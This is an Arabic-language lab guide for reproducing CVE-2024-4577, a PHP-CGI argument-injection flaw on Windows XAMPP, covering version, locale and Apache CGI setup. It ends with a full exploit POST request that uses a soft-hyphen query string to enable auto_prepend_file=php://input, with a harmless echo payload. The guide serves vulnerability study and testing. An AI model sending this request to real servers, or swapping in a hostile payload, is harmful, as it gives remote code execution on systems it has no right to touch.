
إنشاء مختبر لـ CVE-2024-4577
| CVE | الوصف | CVSSv3 |
| CVE-2024-4577 | ثغرة حقن وسيطات PHP-CGI | 9.8 |
"CVE-2024-4577 هي ثغرة خطيرة في حقن الوسيطات في PHP يمكن استغلالها لتحقيق تنفيذ تعليمات برمجية عن بُعد (RCE). وفقًا للباحثين في DEVCORE، هذا الخلل هو نتيجة أخطاء في تحويل ترميز الأحرف، مما يؤثر على ميزة "Best Fit" في Windows." \
قم بتنزيل XAMPP (8.1.25 / PHP 8.1.25) بعد تثبيت XAMPP، تحقق من إصدار PHP. يجب أن يكون 8.1.25. يمكن التحقق من إصدار PHP عن طريق تشغيل الأمر "php -v" من سطر الأوامر. إذا أعطى خطأ، فيجب إضافته إلى متغير PATH الخاص بـ PHP.
يلزم تغيير الإعدادات المحلية. للقيام بذلك، اتبع لوحة التحكم > الساعة والمنطقة > المنطقة. اضبط التنسيق على اليابانية أو الصينية التقليدية أو الصينية المبسطة. انقر على الإدارة > تغيير الإعدادات المحلية للنظام واختر الإعدادات المحلية المناسبة.
إذا لم يعمل PHP في وضع CGI، فيجب إجراء هذه الإعدادات.
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php
<Directory "C:/xampp/php">
Options +ExecCGI
AllowOverride None
Require all granted
</Directory>
LoadModule php_module "C:/xampp/php/php8apache2_4.dll". ضع '#' في بداية السطر.احفظ التغييرات وشغل خدمة Apache.
إذا ظهر مخرجات كود PHP المرسل في نص طلب POST أدناه في الاستجابة، فإن خطوة الاستغلال ناجحة.
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
echo "vulnerable";
?>
هذه البيئة المختبرية مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها في بيئات حية. لست مسؤولاً عن أي أضرار أو خسائر قد تحدث نتيجة الاستخدام غير السليم. يجب على المستخدمين استخدام هذه البيئة على مسؤوليتهم الخاصة.